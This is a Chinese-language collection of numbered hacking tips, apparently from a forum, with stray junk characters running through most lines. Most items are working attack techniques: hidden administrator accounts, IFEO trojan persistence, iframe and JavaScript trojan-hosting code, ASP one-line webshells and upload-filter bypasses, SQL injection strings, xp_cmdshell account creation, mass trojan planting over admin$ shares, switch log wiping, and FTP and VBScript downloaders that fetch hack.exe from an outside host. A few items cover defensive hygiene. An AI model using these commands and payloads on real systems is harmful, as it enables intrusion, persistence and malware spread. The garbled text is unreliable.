Xp系统修改权限防止病毒或木马等破坏系统,cmd下,6 @" z/ b/ v# ?. u" W, A
cacls C:\windows\system32 /G hqw20:R" _, \5 z: ]2 N7 H3 u# {$ j
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入 O1 C+ k. \2 a' Y6 N2 m
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F/ O) R: a' t) v% Z
0 r6 K+ M( Q) ?$ s! q, V2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
* q9 ?, [* G2 |! ?
9 M# j. W2 N5 y3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
2 `3 Z# F( d- v+ D z6 |
; x4 p1 |& @) W0 z! c4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号, }8 s' n0 a2 Y5 X3 J
. @8 I A+ k( h% |
5、利用INF文件来修改注册表
. q1 V( H& M9 {! I5 k& }- G) d[Version]) {7 i1 A" Q0 A" ?, T2 ~8 U
Signature="$CHICAGO$" h$ S6 k0 W' s% @% W( p
[Defaultinstall]
+ y1 [! T* e: }7 DaddREG=Ating
, I9 t1 S2 ^, T( h/ ^2 h[Ating]6 f# J1 E0 ?7 J& U, o( p
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"7 c: x# I+ d7 t1 D, D# G
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:0 t U) a$ C& ~$ R
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径0 I+ f4 g" d8 x0 d( H
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
/ N4 } R5 ]# x( w& k/ x! fHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
3 a& d' A+ b$ W0 B& X: ?9 |7 bHKEY_CURRENT_CONFIG 简写为 HKCC
7 I$ F, L3 h ?+ |- n+ V# u% h0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
7 H# }+ H6 u: V5 d c* k. x"1"这里代表是写入或删除注册表键值中的具体数据- |/ C; F7 Z* M6 t" `4 f* V
5 A' U" a& z' f
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
1 o4 a* F5 F7 E$ p- ?4 v0 M3 W多了一步就是在防火墙里添加个端口,然后导出其键值$ f; | Q- j& W e- S& y$ m$ x
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
: N9 v& f0 Q6 t/ b$ |
* U' [+ ]/ s# X% e- H4 h9 g7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽: G) p$ Z7 g% m' f" q
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
0 u+ a6 o8 U7 H: t( H' S$ U: h+ M* `
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。 y I* _0 N+ I* X+ V, |/ ?' Q6 n
5 A+ w" W0 B8 w$ C9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,% m1 ^- Q1 h2 ]$ p' w. ]8 I
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。+ g7 `) J) l5 G1 |2 i; A5 K% Q
5 ^+ O0 A' F) Q10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”' C3 }3 ^) @' @% I( _& M: v1 M
/ \ a7 J. G5 r' ?9 m
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
! p, G: ~6 c4 \/ |$ s6 h. F1 C用法:xsniff –pass –hide –log pass.txt
* h8 ]* N9 G: b2 j% ^# i D
; J! J! Z8 j5 e5 @, _7 o3 T12、google搜索的艺术
+ u# r) L5 v7 J3 H: z" Z1 q7 L- h2 R搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”. [) g. V/ Z$ K% _6 ^/ |
或“字符串的语法错误”可以找到很多sql注入漏洞。
( d& N2 y* N5 r% W% m. X" J. d* ]# L$ ^ c" Z4 b8 O- T `3 s, h
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
# M4 a, n, I0 r7 p. e/ B7 n0 K
' q; E; T1 n! [) w5 w! C' J* M! r6 s14、cmd中输入 nc –vv –l –p 1987" j2 x1 E7 Q. D$ q1 d' y+ K: r
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃9 b$ S4 w# s4 r; V* y
3 H/ B4 f" `* A: q
15、制作T++木马,先写个ating.hta文件,内容为8 B( n# E1 f; H* ^; T0 n
<script language="VBScript">1 C' ?: M0 m, B, ]5 I1 |% N {$ A
set wshshell=createobject ("wscript.shell" )
/ ^( Z3 b1 S& La=wshshell.run("你马的名称",1)
+ O' F& h; Q* l4 ]+ Owindow.close. A3 o7 P$ \' a7 L" q( q3 }
</script>/ \" q& i h. T3 h$ t
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
) s; b# t9 o. T8 M K6 F; x A( l4 U+ E9 ?2 [/ [3 v
16、搜索栏里输入
8 o) l1 c6 Y) h% t关键字%'and 1=1 and '%'='# M- W0 |7 v1 @% M" r
关键字%'and 1=2 and '%'='. c: \3 P- w/ ^9 l3 e+ o
比较不同处 可以作为注入的特征字符
$ Q0 J6 w* p7 o" H# k8 \
7 [4 l# O5 z ~6 T6 V17、挂马代码<html>
3 B5 I& d# C- @<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
. s% x* @" D: B</html>) x5 x# }: h+ T, X5 p9 S* C
. Y- z1 G- i% A8 p) _) U- P% M
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
& z) X6 D$ H" z# s$ c! y2 Onet localgroup administrators还是可以看出Guest是管理员来。- _" X/ V+ H' @: p6 G( J8 F1 _, u
' _ N' g, O3 q+ \8 S5 R" m
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等) U' Y/ {6 f; H5 {$ @) H: D
用法: 安装: instsrv.exe 服务名称 路径/ i! D0 D5 G* X% e, X
卸载: instsrv.exe 服务名称 REMOVE7 A$ h; ]: M' w- |8 T; B# p; v+ e
' V; y- S) |- u M
9 f: L! Z; g ?5 ]( ^/ ?+ R7 q21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉5 H1 m \ R6 K
不能注入时要第一时间想到%5c暴库。3 w( g6 w. P7 b7 [! _
' o6 o7 ~; n8 C2 e7 ], {, k0 O22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
( C) z) K6 O4 `# g( w+ w- X4 o
3 x8 O/ x& V& U1 ~; J w23、缺少xp_cmdshell时
# Y; h; g( |# ~& u; ] z# u5 C1 D q尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'! l' j. ~% D! j3 o2 u
假如恢复不成功,可以尝试直接加用户(针对开3389的), Q9 `9 x0 o7 U2 l
declare @o int
# N1 V$ G( g$ ]5 aexec sp_oacreate 'wscript.shell',@o out
$ r2 O( @% M4 Y2 C- }) }5 S& R/ Z* S% \exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员2 c7 Z# I( f- A" u5 U( w2 C% F3 ^
2 ]& {' m$ Z2 k8 A. R( M4 V D0 N" r% @24.批量种植木马.bat8 g3 p* T( h& y% _- p
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中) c4 p/ c v% g. Y+ H7 ?+ V
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间$ E% b! f" b: a0 c2 b) ~, m
扫描地址.txt里每个主机名一行 用\\开头6 p- j' G# ~) B) p# @
$ W4 @5 b4 C5 [ X
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。- \! [2 M4 f9 u4 M+ d" l
8 M$ Y! _) \9 e" N
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
" q: P S; N& G) v# t7 e3 V将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.+ c) X _4 p/ Q
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马! I" P5 P& f* n2 r
* s- t) d; X- h1 n/ d9 |$ q
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP( s5 C# N* i' K" i& E( q) K
然后用#clear logg和#clear line vty *删除日志
' {+ j; V; p: b- g+ g
& k! Y0 T/ r- c28、电脑坏了省去重新安装系统的方法( [% G# V9 O/ N x- m) N
纯dos下执行,9 {; }1 G9 h& P
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config0 i. A- R0 x# L; e
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
" |- V0 `( P! E5 N7 R9 n& M8 q+ u8 t) x3 t z
29、解决TCP/IP筛选 在注册表里有三处,分别是:% u- l+ D: U I( A- P
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
/ V- ^1 N. L# Z3 j) V9 kHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
8 Y6 y7 D" W5 Y" Y' }HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
9 o- e3 N# j) \' K" i分别用* {" d4 w' N6 o" o7 e' \; \& w
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6 K' X, {2 D$ J3 c5 ^3 B1 I
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
3 |. W( p6 H E3 I$ T1 Aregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip1 b1 Z8 g5 i! L# o/ V) x
命令来导出注册表项
" V: u7 ^$ I" s$ y1 g! D然后把三个文件里的EnableSecurityFilters"=dword:00000001,7 _$ }; a0 M. a' y
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
* R- ~0 T! p. d, Dregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
/ B0 U a; A3 Q: g' h1 f) {" e. y' ]# x P
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U* @) Y1 R) ?$ p5 Z/ q) y
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
0 H& [# T+ K: K/ Q: f* _$ v/ z" P0 I
31、全手工打造开3389工具/ I" f& D+ A7 k# Z- d" U/ c$ v" K/ c
打开记事本,编辑内容如下:- Z. _& C# H- y1 P' V
echo [Components] > c:\sql
3 d6 }3 F& V7 ~. Y8 V" t- v; Zecho TSEnable = on >> c:\sql
- S& V0 \; h4 Zsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q: }1 h/ e# r$ M. B$ ?9 @
编辑好后存为BAT文件,上传至肉鸡,执行
: B# _3 V: E) f1 H9 o+ t
: T1 {# T3 \1 E* D" D& J Z32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马: n: n3 l9 I& g! ]
2 S+ i4 l( B0 o" z3 l W! V( Y
33、让服务器重启
( @. j* e7 r# h9 V! j. u& x1 Q! ]写个bat死循环:: o0 R$ Y1 b* s7 B4 H, W2 z
@echo off
5 i2 P, E; T7 z ~) ~7 o6 m:loop1
0 j3 J1 D. \! Y9 T: Y8 _/ Zcls! Y' M) e5 C* \+ {; ^# b9 _4 J
start cmd.exe- ~. U4 {1 Q( A9 H2 B* i/ X0 M
goto loop1' |. _0 p, k4 F% b/ B
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启$ k1 A7 n0 y7 W5 g7 \, G* j
9 w9 S& f8 s9 v" |
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
& u0 Q& J2 o0 P$ Z+ b@echo off- S% D2 h4 _7 a, {
date /t >c:/3389.txt
5 U: D. `6 X* Y$ I- M& s/ H" Ttime /t >>c:/3389.txt
8 d* E) {( I: L5 v- r$ yattrib +s +h c:/3389.bat
; l% x) y. j, U; ^8 }attrib +s +h c:/3389.txt
. m/ E- e: v. h; `: ?" a: a/ `) Vnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt- ]: f. y% J1 l$ _: [8 }" B
并保存为3389.bat- A" d7 D) c3 t+ ^. p* `4 |% q" R
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
- R6 ?) @; K- D+ ~* y' U' \3 ]. F% f' b. A
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
4 u" e w7 s$ Rstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)' F0 y x# t l/ y9 b
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。 N: V) s8 ]) }, ?
# H$ D7 S) I" \+ W36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件) g% D* z* z% p0 F/ ^+ [* W$ l2 \
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址; A" `; g1 \- c( C0 l* R
echo 你的FTP账号 >>c:\1.bat //输入账号
) a: v" e7 f8 g& H' L5 I% E0 Z4 mecho 你的FTP密码 >>c:\1.bat //输入密码: V" i# I, b% J9 W6 \$ q
echo bin >>c:\1.bat //登入
+ I ^# Q) W6 d' \. lecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
$ g9 A M# ]& M/ U6 lecho bye >>c:\1.bat //退出
# D$ M5 l$ ]) x% @3 D- U然后执行ftp -s:c:\1.bat即可
5 l" _+ ^) X8 @+ e9 p
3 ]% H p% u ]( T6 Y3 `37、修改注册表开3389两法$ z3 E0 C' |5 O; Q1 S" ^
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表( ?: W% n) _! y* E* g6 _3 ?
echo Windows Registry Editor Version 5.00 >>3389.reg
: B8 L& ?$ _: T, C' gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
: S/ f! L# y, \, o! o' Pecho "Enabled"="0" >>3389.reg
3 d7 p9 \) N" t) g( kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
1 X {8 h8 K3 GNT\CurrentVersion\Winlogon] >>3389.reg0 G0 {0 c. j1 E2 y' x% X4 `
echo "ShutdownWithoutLogon"="0" >>3389.reg
6 k; ~4 ]3 N3 {2 v* j1 U8 uecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]6 j! S7 L: R3 e% g$ x
>>3389.reg! j# {0 n& x( z w6 y3 a
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
2 j) L `1 Y' v* m/ f- g( Becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
+ l# ]% a9 R& R; p/ }1 D3 r>>3389.reg2 r9 k7 w$ h1 N1 x
echo "TSEnabled"=dword:00000001 >>3389.reg& k0 C U9 `. x, p4 T! e0 D, h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
[% c/ R% i. n) qecho "Start"=dword:00000002 >>3389.reg
: V& R/ `# H- |( K8 K0 L. x1 oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
. Q& @; K P; O( |>>3389.reg7 Z! h W, T. u0 X7 O5 `
echo "Start"=dword:00000002 >>3389.reg3 r; D! b, e4 _) K5 g
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg9 g" d) x- A+ [% o9 C8 M4 S
echo "Hotkey"="1" >>3389.reg
" E6 s' U3 a) {& Z! [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) S+ r' A8 D# a
Server\Wds\rdpwd\Tds\tcp] >>3389.reg r2 I6 c$ Q. h
echo "PortNumber"=dword:00000D3D >>3389.reg% Z3 I6 Y5 |5 ]- H( I* i, C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& R# C5 U' s a5 yServer\WinStations\RDP-Tcp] >>3389.reg
2 {3 v7 |) ], ~( N2 @0 secho "PortNumber"=dword:00000D3D >>3389.reg- J1 ]. l5 p$ N6 K; {1 k
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。/ C( F/ i O0 p) S( [9 C
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)% F4 ]5 e" T6 j' ]! l$ M# w
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
+ Y: x& M& A# Y* w* H, j(2)winxp和win2003终端开启
- R9 _: l6 K5 H% ~5 x6 V用以下ECHO代码写一个REG文件:( l* K; T t1 ^1 }( g4 G. a- J
echo Windows Registry Editor Version 5.00>>3389.reg
7 h& i9 D4 E) U+ l( D: \0 p* gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal9 J2 l( C% d9 Z: b) z
Server]>>3389.reg7 |9 k" \* V5 i! L2 ?
echo "fDenyTSConnections"=dword:00000000>>3389.reg
/ U& A# A- y' @6 Z1 X5 Oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" h1 R( \: x( z' y
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
- ~# H- U: p$ X- G3 ?echo "PortNumber"=dword:00000d3d>>3389.reg
' j* V, K8 S5 i2 Y/ ?5 H2 G( X& [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ P/ s# o9 b% c3 B0 X; VServer\WinStations\RDP-Tcp]>>3389.reg l. J" o$ g5 x' b8 `7 M
echo "PortNumber"=dword:00000d3d>>3389.reg
" T- }, `: u$ o$ Y% W0 j然后regedit /s 3389.reg del 3389.reg( O8 R4 x" |+ X; u) ^, F
XP下不论开终端还是改终端端口都不需重启
' C0 c. }+ F' F
5 d2 a( ? L# n# J5 h# M38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
+ w# a8 [$ A+ L3 V用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa': l# m6 L7 l' V% h. M+ t
1 }! L( `4 `. \6 l }
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
3 r; Q7 O* R' C/ a9 B/ q(1)数据库文件名应复杂并要有特殊字符! V0 Y3 l5 E: Y0 V- U/ I
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源 ~( [# K, a% E9 \2 M
将conn.asp文档中的
, A% G* k: q5 @- o7 H7 V( k1 kDBPath = Server.MapPath("数据库.mdb")0 |+ w( a$ g2 J8 x1 g: h
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath v0 ?/ r1 h0 N; E
/ j/ l& d$ D4 R( W/ E修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置 F3 q% T' S) ^9 H
(3)不放在WEB目录里0 t0 h: M/ J9 b2 t
$ e) L7 @: A& O( i40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
9 ?+ l% V8 Y) g5 d. p" o8 V可以写两个bat文件
2 A" I2 u) ?! h) K: r@echo off; b; k; N. U; j1 m0 t8 v# e$ U! Y$ q
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
4 |# \4 R6 t2 P L/ F4 [@del c:\winnt\system32\query.exe
! v. }$ S2 G/ P( B/ ?@del %SYSTEMROOT%\system32\dllcache\query.exe* D0 M6 w! a2 I: v
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
, e, _- ~6 A3 ~. E) U) m( P M9 a# F
@echo off
+ p/ A: F6 d0 d8 @% O" A@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe2 B. W3 p _, ]8 h
@del c:\winnt\system32\tsadmin.exe0 K K G% J, q! `( B
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex6 K2 C+ m: f5 b! X8 D( }) Z! \- V
! _. X8 G6 g- `# c- ^
41、映射对方盘符
% `& n+ p+ C6 Q- u6 G- x/ {6 z( Dtelnet到他的机器上,
5 V0 n7 ]1 m+ F& _9 Q hnet share 查看有没有默认共享 如果没有,那么就接着运行: q' i% l: U' u
net share c$=c:- }0 \$ Q0 `! M& t% f, J" \3 a
net share现在有c$
0 `5 t& E' a& K在自己的机器上运行' X% W) r( C3 v4 G8 I
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
' L' q1 N" ?$ u( q. j
! a1 t9 l* p6 s3 R; g, _42、一些很有用的老知识
7 M X7 A4 \/ L3 otype c:\boot.ini ( 查看系统版本 ): d9 c/ D5 q( \' X$ K! r; u9 p
net start (查看已经启动的服务). C0 e" H. H1 X( \1 ?; K: r- Q
query user ( 查看当前终端连接 )- c1 E9 R# P4 T, _1 h2 K: Z
net user ( 查看当前用户 )" g1 a9 T+ o( y) A% Q
net user 用户 密码/add ( 建立账号 ): {4 B A8 Z+ M, t. t
net localgroup administrators 用户 /add (提升某用户为管理员)
. d7 H3 [" p# T9 M* X% cipconfig -all ( 查看IP什么的 )# x* M6 Q+ y2 l* |0 F
netstat -an ( 查看当前网络状态 )9 a+ Q! e1 Q9 r: H( I; p
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
7 Z& ] p+ I- ~( R+ B2 [5 s9 \. ^克隆时Administrator对应1F4: p0 N( v& G5 f' _9 u5 P
guest对应1F5
, A* `- @% S. z$ c: b/ W2 ntsinternetuser对应3E8
/ Y' }/ T( ]* B5 l, G* y2 Y* @! z6 [, q$ d- F+ h
43、如果对方没开3389,但是装了Remote Administrator Service$ ?7 G! _9 G( ]5 ]$ b$ Q
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接8 J7 u w: V( y- T* N$ n+ Q
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
0 A- O# h i+ L7 j+ [先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"& f" @) Y' X( S2 I
( H: k. d4 w, {" l( B6 ]% D44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
( V( u9 l2 M$ z8 T/ I本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)) L/ c1 N: Y% b' W9 c4 V
7 u* J3 Z/ P1 N7 r) x, M45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
* K' q! O5 T- H6 h; G* D! n' w0 }9 xecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open5 h$ W M& j {
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
# c& `2 d3 D* ~CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =/ E: l K0 P# o$ ?. w
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
( G# g! o! C) { T# d(这是完整的一句话,其中没有换行符)* ~; ~. u! c+ |8 m" G3 q* i
然后下载:
7 a2 {8 O. c( `0 ]1 C1 p% V, Scscript down.vbs http://www.hack520.org/hack.exe hack.exe! Y: L9 S @+ `" h8 T
3 u' a) e# r4 S' V4 ^; M46、一句话木马成功依赖于两个条件:4 I1 W" n) A% T: c
1、服务端没有禁止adodb.Stream或FSO组件
$ g5 w5 j. T; d% }) d/ S. B2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。2 h& A7 G% A8 z, P! f
% C" Q, E* u& a47、利用DB_OWNER权限进行手工备份一句话木马的代码:
" o2 ~; J O* c& H6 o* @; N;alter database utsz set RECOVERY FULL--
& A4 \* B) w! m6 o t- g;create table cmd (a image)--: q4 G8 }/ k+ z Q M7 @
;backup log utsz to disk = 'D:\cmd' with init--7 G# P% @* e0 Y; M& T5 ]
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
. p8 z J1 K( N/ ^4 d/ ];backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
- |2 K, f; Z0 P& I \$ H注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。3 q2 s N5 D) k7 W
q' @" {6 i9 Y- K# Y ~' i48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:) P K I+ H" E& v" R- B
d! z% i$ d1 j5 t) y
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options* p# h/ I: @4 m, ]6 A6 b2 a* f
所有会话用 'all'。
2 M% t( v8 Y" A1 I e-s sessionid 列出会话的信息。
, Y5 Z! J7 f- U* F4 _-k sessionid 终止会话。- f; R& n, {. t/ l& v
-m sessionid 发送消息到会话。9 w5 P2 u- C% v$ Z& n4 C
/ l, g: B3 Y8 D% e' S7 g: Z
config 配置 telnet 服务器参数。
3 R* W& h% S$ N5 l+ Q- K3 f- j. `, l- [ V4 ?, R+ w
common_options 为:
! U* j) V4 w1 Y3 |-u user 指定要使用其凭据的用户
! v' z3 H$ c# A2 D7 q- g% P- r-p password 用户密码
8 \4 _+ k8 ?, f. w3 {* }8 g; R5 l7 x3 `; C( M1 ?) `; L; I& S6 |
config_options 为:& J# A# i' j$ s/ v3 A9 }8 c/ I
dom = domain 设定用户的默认域5 j3 J" {) |9 q
ctrlakeymap = yes|no 设定 ALT 键的映射
: u% Z; l0 s3 n+ _' L2 d7 etimeout = hh:mm:ss 设定空闲会话超时值2 u% }, n# k+ f, Q
timeoutactive = yes|no 启用空闲会话。& ]2 b3 t8 i" n5 M$ m. f2 n, }
maxfail = attempts 设定断开前失败的登录企图数。
, ]& j* R( y5 _3 n D" ymaxconn = connections 设定最大连接数。
9 V* O) D# }( u7 \/ e2 w9 yport = number 设定 telnet 端口。, Q' n7 s. l, x9 c# F; z6 w3 g
sec = [+/-]NTLM [+/-]passwd
/ _% Z8 h# {; `& \8 ] {设定身份验证机构" ?. r9 x7 m6 d( b' K
fname = file 指定审计文件名。
& H9 k4 f5 ?+ J% pfsize = size 指定审计文件的最大尺寸(MB)。
' d" M* n% t+ Z- zmode = console|stream 指定操作模式。! v% b/ S0 J' ]: z7 u' X) h, {/ T1 b
auditlocation = eventlog|file|both: n1 I, ]* g2 q( i0 P% M( c7 E5 A5 v
指定记录地点& B( j' M! K5 a# K/ R
audit = [+/-]user [+/-]fail [+/-]admin
( o! }& T; ?' f$ o3 x; ~- c7 c" p, h
49、例如:在IE上访问:
% r% E [" \1 Z8 J* \www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
0 @* Q' ]2 z$ O7 E6 t$ zhack.txt里面的代码是:& o7 E' \* u, X; A( S* h! n
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
, i0 x+ S, i+ B6 t2 i# Q把这个hack.txt发到你空间就可以了!
) ^4 _( Y- Q! k7 H这个可以利用来做网马哦!
' _( M* T+ ?' f# Z% y! K2 b- D9 g( B) m8 [7 p* P
50、autorun的病毒可以通过手动限制!* U1 |6 p/ T: \
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!+ b+ m1 \$ n8 W" A, m
2,打开盘符用右键打开!切忌双击盘符~
* l2 d- S: e, J& x. o9 I$ Q* A8 b3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!- R& P, r) q, [: H/ h. Z
6 n0 A/ T' I2 z3 T( W
51、log备份时的一句话木马:
& _2 g X; W3 Q# f4 na).<%%25Execute(request("go"))%%25>! T2 u' g2 q; A5 W5 _: |; m/ \
b).<%Execute(request("go"))%>
7 V6 I5 q# R# e6 X5 Dc).%><%execute request("go")%><%3 u1 Q, _1 h0 y8 b1 n1 s4 o
d).<script language=VBScript runat=server>execute request("sb")</Script>
8 e0 b: m! @$ N7 p) I! {& H9 Z7 ~e).<%25Execute(request("l"))%25>
9 B, m* ~0 a/ E' |f).<%if request("cmd")<>"" then execute request("pass")%>$ r( u/ F% t2 A$ j. p& Y1 [
4 f$ j, G0 Q2 \8 t" w5 E
52、at "12:17" /interactive cmd
